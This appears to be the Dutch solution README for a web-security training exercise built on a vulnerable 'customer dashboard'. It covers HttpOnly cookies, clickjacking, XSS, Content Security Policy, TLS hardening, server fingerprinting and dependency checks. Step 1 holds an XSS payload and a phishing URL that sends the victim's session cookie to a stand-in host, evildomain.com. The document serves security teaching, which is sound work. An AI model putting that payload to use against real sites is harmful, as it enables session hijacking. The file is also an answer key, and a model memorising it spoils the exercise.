## Oplossing
### 1. HTTP Only flag uitbuiten

#### 1a. Vind alle sessie cookies in saltcustomerdashboard.com
![Http only flag](/readme-images/http-only.png)

#### 1b. Javascript code en cookies lezen
De invoervelden `User` en `Employer` op de dashboard pagina zijn kwetsbaar voor een XSS-aanval.
`<script>alert(document.cookie)</script>`

#### 1c. Javascript code en cookies lezen via een phishing link
`http://saltcustomerdashboard.com/dashboard/?id=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fevildomain.com%2Fecho%3FvictimCookie%3D%27%20%2B%20document.cookie%3C%2Fscript%3E`
#### 1d. Vind het echte session cookie van Spring Security
De naam van de sessiecookie is `slt_ffhddhs23984`.

#### 1e. Bescherm de sessie cookie
* Voeg `Header edit Set-Cookie ^(.*)$ $1;HttpOnly` toe aan de httpd.conf file.
* Pas `server.servlet.session.cookie.http-only=` aan naar `true`






### 2. Evil Iframes
#### 2a. Onderzoek een Iframe kwetsbaarheid
*Volg de instructies uit de opdracht*.

#### 2b. Bescherming tegen clickjacking via Iframes  
Voeg `Header always set X-Frame-Options "sameorigin"` toe aan de httpd.conf file.





### 3. Cross-site-scripting (XSS)

#### 3a. XSS en de HttpOnly bescherming
*Volg de instructies uit de opdracht*.

#### 3b. Pas de phishing link aan

#### 3c. Configureer een Content Security Policy
Voeg `Header set Content-Security-Policy "default-src 'self';"` toe aan de httpd.conf file.

#### 3d. Broncode aanpassing 
Pas `th:utext` aan naar `th:text` in het bestand `dashboard.html` in de applicatie.





### 4. SSL Certificates
#### 4a. Configureer SSL verbinding
* Het certificaat kopieren in de Dockerfile-apache `COPY ./infra/apache-selfsigned.crt /usr/local/apache2/ssl/apache-selfsigned.crt`.
* De key kopieren in de Dockerfile-apache `COPY ./infra/apache-selfsigned.key /usr/local/apache2/ssl/apache-selfsigned.key`.

#### 4b. Stel het SSL poort
* Port toevoegen aan de docker-compose file voor apache `- "443:443"`.

#### 4c. Activeer SSL
* De httpd-ssl.conf kopieren in de Dockerfile-apache `COPY ./infra/httpd-ssl.conf /usr/local/apache2/conf/extra/httpd-ssl.conf`.
* Aanzetten van `Include conf/extra/httpd-ssl.conf` in de httpd.conf file. (Dit staat nu uit gecomment).


#### 4d. Activeer SSL
* Pas `Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure` aan. (zie opdracht 1e.)


#### 4e. Test de TLS/SSL verbinding op zwakheden
*Volg de instructies uit de opdracht*.

#### 4f. Verbeter de TLS/SSL zwakheden
* Voeg toe aan `httpd-ssl.conf`:
* `SSLProtocol -all +TLSv1.3 +TLSv1.2`
* `SSLCipherSuite ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-GCM-SHA256`
* `SSLCipherSuite TLSv1.3 TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_128_GCM_SHA256:TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_128_GCM_SHA256`
* `SSLHonorCipherOrder on`




### 5. Fingerprinting webserver
#### 5a. Achterhaal het versienummer en type webserver met fingerprinting
Versie `2.4.49`

![Fingerprint](/readme-images/fingerprint.png)

#### 5b. Controleer op kwetsbaarheden
[CVE-2021-42013](https://www.cvedetails.com/cve/CVE-2021-42013/)

#### 5c. Patch de webserver
*Volg de instructies uit de opdracht*.



### 6. Kwetsbare afhankelijkheden
#### 6a. Installeer de Dependency Checker
*Volg de instructies uit de opdracht*.

#### 6b. Draai maven lokaal op de binaries te genereren
*Volg de instructies uit de opdracht*.

#### 6c. Voer de dependency checker uit
*Volg de instructies uit de opdracht*.

#### 6d. Bekijk het gegenereerde rapport
*Volg de instructies uit de opdracht*.

#### 6e. Repareer de snakeyaml kwetsbaarheid

